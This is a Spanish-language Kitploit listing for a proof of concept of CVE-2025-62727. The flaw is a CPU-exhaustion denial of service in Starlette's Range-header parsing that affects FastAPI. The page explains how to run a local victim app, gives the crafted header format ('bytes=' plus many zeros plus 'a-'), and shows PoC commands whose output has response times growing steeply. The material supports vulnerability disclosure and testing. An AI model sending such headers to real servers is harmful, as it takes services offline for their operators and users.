Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-62727-Demo — Prueba de concepto de CVE-2025-62727 que puede causar denegación de servicio en FastAPI (basado en Starlette <= 0.48.0) | Kitploit
Herramientas/GitHubGitHub/ch4n3-yoon/cve-2025-62727-demo
Análisis de VulnerabilidadesExplotaciónSeguridad WebSeguridad de APIs
GitHubch4n3-yoon/cve-2025-62727-demo

CVE-2025-62727-Demo

Prueba de concepto de CVE-2025-62727 que puede causar denegación de servicio en FastAPI (basado en Starlette <= 0.48.0)

Ver Repositorio
1hace 10 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Demo CVE-2025-62727

Descripción de la víctima

La víctima objetivo de CVE-2025-62727 es una aplicación FastAPI sencilla que:

  • Sirve Hello World en /.
  • Sirve archivos estáticos bajo /static usando StaticFiles de Starlette.
  • Genera automáticamente archivos de texto que contienen A repetida N veces para N en 1024, 2048, 50176 al iniciar.

Cómo ejecutar la víctima

  1. (Opcional) Crear y activar un virtualenv.

  2. Instalar las dependencias:

    root@kitploit:~
    pip install -r requirements.txt
    
  • Iniciar el servidor:

    root@kitploit:~
    uvicorn main:app --reload
    
  • Abrir:

    • http://127.0.0.1:8000/ para la página de índice.
    • http://127.0.0.1:8000/static/1024.txt etc. para los archivos estáticos.

    Notas

    • Los archivos estáticos se generan en el directorio static/ al iniciar la aplicación. Los archivos existentes no se sobrescriben.
    • El servicio estático utiliza StaticFiles de Starlette como se solicitó.

    PoC: CVE-2025-62727 (Análisis del encabezado Range)

    El poc.py incluido desencadena un análisis de Range con uso intensivo de CPU en FileResponse de Starlette a través de la ruta /static usando un encabezado manipulado de la forma bytes=000...000a-.

    Ejecute el servidor y, en otra terminal:

    root@kitploit:~
    python3 poc.py --sizes 1000,2000,4000,7000
    

    Sobrescriba la URL objetivo (opcional):

    root@kitploit:~
    python3 poc.py --url http://127.0.0.1:8000/static/2048.txt --sizes 1000,2000
    

    Notas:

    • El PoC apunta a http://127.0.0.1:8000/static/50176.txt por defecto (un archivo que la aplicación genera). Use --url para cambiarlo.
    • Ajuste --sizes hacia abajo si ve 400/431 (encabezado demasiado grande), o hacia arriba si los encabezados tienen éxito y desea un efecto más fuerte.

    Ejemplo de resultado:

    root@kitploit:~
    $ python3 poc.py --url http://127.0.0.1:8000/static/50176.txt --sizes '10000,20000,40000,80000'
    [INFO] Target: http://127.0.0.1:8000/static/50176.txt
    [MODE] regex (header = 'bytes=' + '0'*N + 'a-')
    N= 10000 | header_len= 10008 | status=400 | elapsed=227 ms
    N= 20000 | header_len= 20008 | status=400 | elapsed=883 ms
    N= 40000 | header_len= 40008 | status=400 | elapsed=3530 ms
    N= 80000 | header_len= 80008 | status=400 | elapsed=14525 ms
    
    Descargar herramienta